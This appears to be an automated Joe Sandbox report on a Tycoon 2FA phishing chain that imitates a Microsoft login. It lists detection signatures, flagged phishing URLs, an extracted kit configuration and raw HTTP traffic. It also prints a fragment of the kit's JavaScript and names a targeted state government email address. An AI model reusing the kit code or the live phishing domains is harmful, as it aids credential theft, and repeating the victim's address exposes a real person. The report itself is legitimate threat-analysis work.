Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==

Overview

General Information

Sample URL:https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url
Analysis ID:1510807
Infos:

Detection

HTMLPhisher, Tycoon2FA
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Found malware configuration
Yara detected HtmlPhish10
Yara detected Tycoon 2FA PaaS
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 3224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2312,i,3901207920137646878,15146386042684683243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"websitenames": "[\"godaddy\", \"okta\"]", "capnum": "1", "appnum": "1", "view": "", "pagelinkval": "BpEj8L4o39Xk", "emailcheck": "hans.anderson@ag.state.mn.us"}
SourceRuleDescriptionAuthorStrings
7.15.id.script.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
    7.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      7.6.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
        7.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          7.5.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://saj.mordantif.com/56RePLZ7UZmHT23036MEuv60Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/34PjDiabG2bEMu6719Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/45itnDnlBkLf89wB5guMvj2hxy65Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/12KYWgiq1CIPJtcA56dot1AeMqr50Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/q8Yr/Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/90cIpGfk2aMerArq2KIwyO12gL058Oayz79Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/ypEsiIUl5CT4iuptTEAbaxVXn8Z2jjwd4LQaqtbwZaSDIcVcqAvira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/q8Yr/?ILhans.anderson@ag.state.mn.usAvira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/pq4G6HI3Ijg6dT2j1yzOjuv38Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/favicon.icoAvira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/jaG38jlE3Csa6VPdagQNh1ZGRwn6zNGNrENQrVC1wpG35UrCP39QdzkAvira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/cdwMHwMulA2IdrzZU0QtBhWShA342kvmGDEeGbEkl100Avira URL Cloud: Label: phishing
            Source: https://saj.mordantif.com/abPT4sUgOrsEgh28Avira URL Cloud: Label: phishing
            Source: https://hyu.prosolmi.su/303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZVAvira URL Cloud: Label: malware
            Source: https://saj.mordantif.com/kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220Avira URL Cloud: Label: phishing
            Source: 7.15.id.script.csvMalware Configuration Extractor: Tycoon2FA {"websitenames": "[\"godaddy\", \"okta\"]", "capnum": "1", "appnum": "1", "view": "", "pagelinkval": "BpEj8L4o39Xk", "emailcheck": "hans.anderson@ag.state.mn.us"}

            Phishing

            barindex
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TLLM: Score: 8 Reasons: The domain'mordantif.com' does not match the legitimate domain associated with Microsoft, and the subdomain'saj' does not provide any context or information about the webpage's purpose or affiliation. This discrepancy between the brand name and the domain name suggests that the webpage may be a phishing attempt or a fake login page designed to trick users into providing their login credentials. DOM: 7.5.pages.csv
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TLLM: Score: 8 Reasons: The domain'mordantif.com' does not match the legitimate domain associated with Microsoft, which is'microsoft.com'. The presence of a subdomain'saj' does not alleviate this concern. The visual LLM's analysis suggests a phishing attempt or a typo. DOM: 7.6.pages.csv
            Source: Yara matchFile source: 7.6.pages.csv, type: HTML
            Source: Yara matchFile source: 7.5.pages.csv, type: HTML
            Source: Yara matchFile source: 7.15.id.script.csv, type: HTML
            Source: Yara matchFile source: 7.6.pages.csv, type: HTML
            Source: Yara matchFile source: 7.5.pages.csv, type: HTML
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TMatcher: Found strong image similarity, brand: MICROSOFT
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TMatcher: Template: microsoft matched
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TMatcher: Template: microsoft matched
            Source: https://saj.mordantif.com/q8Yr/#Lhans.anderson@ag.state.mn.usMatcher: Template: captcha matched
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "bpej8l4o39xk";var emailcheck = "hans.anderson@ag.state.mn.us";var webname = "rtrim(/web8/, '/')";var urlo = "jag38jle3csa6vpdagqnh1zgrwn6zngnrenqrvc1wpg35urcp39qdzk";var gdf = "iji7vj3pzxuvmqma6mioicyeuvuc23b315n0ab120";var odf = "gh8co6d03pmijvnbn4vooefpuvxecewvbopab650";var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";let useragent = navigator.useragent;let browsername;let userip;let usercountry;var errorcodeexecuted = false;if(useragent.match(/chrome|chromium|crios/i)){ browsername = "chrome";} else if(useragent.match(/firefox|fxios/i)){ browsername = "firefox";} else if(useragent.match(/safari/i)){ browsername = "safari";} else if(useragent.match(/opr\//i)){ browsername = "opera";} else if(useragent.match(/edg/i)){ browsername = "edge";} else{ browsername="no browser detection";}function encryptdata(data) { const ...
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: Number of links: 0
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://saj.mordantif.com/q8Yr/#Lhans.anderson@ag.state.mn.usHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: Title: Blockchain Basics does not match URL
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: Invalid link: Terms of use
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: Invalid link: Privacy & cookies
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: Invalid link: Terms of use
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: Invalid link: Privacy & cookies
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: <input type="password" .../> found
            Source: https://saj.mordantif.com/q8Yr/#Lhans.anderson@ag.state.mn.usHTTP Parser: No favicon
            Source: https://saj.mordantif.com/q8Yr/#Lhans.anderson@ag.state.mn.usHTTP Parser: No favicon
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: No favicon
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: No favicon
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: No <meta name="author".. found
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: No <meta name="author".. found
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: No <meta name="copyright".. found
            Source: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6THTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49737 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49722 version: TLS 1.2
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com to http://mithunaads.in/m/45043/agfucy5hbmrlcnnvbkbhzy5zdgf0zs5tbi51cw==
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49737 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw== HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /amp/mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw== HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=WAvHDQo9rXlVA_D7qBDiOgxhmpZ89HJycq3Y9gdpnS5ll8g5WhdhiYfdsaRX3V4ozs4YpMqq2M-92SZoOiJLG4ETue60Fve6SnphdxDx-JP5px97tStsOapKwSO2qkA4Wxb6HozFB1mvk8f4EutNee-LrItYewAmS1eoeaHIrfXyLjr-ZSSe9qJkIitU4oA
            Source: global trafficHTTP traffic detected: GET /q8Yr/ HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://mithunaads.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/q8Yr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJpUXBjZXRpR2NEaitKT25XWjVXalE9PSIsInZhbHVlIjoiZ212N2ZTWUg5bFIvSldZblYrb3hydGVGV09qWDZSZUlxQ1ZXakhQWHNXZlhXTWgrSzN5aVdlVUZ2ZENtWmFZWFJmLzYrSXZyK2NRNUlqNDhvQ0kyemFzMWJBME5Dc1lnWnFUa3B2NUJiWTNhaWN0dHcycXBtTWZ0QVE0M0hPTTgiLCJtYWMiOiI3YmQ5OTcwNzgzYTUxZTE3M2EzY2ViYWMwOGYyZmExNDIzZTFjNWNhOGJlNmUxNmUyYmZmMGNlMDE0ZDMwMjUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9NUjJ1d0JEMlZ0MHFtTDRiQXQrVGc9PSIsInZhbHVlIjoiQW5qdC9qbWxpaUczZll4WW5ETks2SGN4RTJKc3hiUUFjdmhFQWRzempJZllOd3RSM1ZQSFlWaytsWlN3S3hTZzhMWUw4NnJCT2p4WXl0YVExdG42NHZPUU5UK0pReUVrVHlOc0tXL2xCZ1ZBb216Z0s1dkNQWHJwTkExeEg2MXAiLCJtYWMiOiIyYmRlNWUwOTlkN2Q0MzI4ODFkNGRjZmQzNWNmZTZlZmVhYTUxZmE4YjUwMzcwOWQxMTczYzQxNjRjZDQ3Njc0IiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZV HTTP/1.1Host: hyu.prosolmi.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://saj.mordantif.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZV HTTP/1.1Host: hyu.prosolmi.suConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/388c99dd0998/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
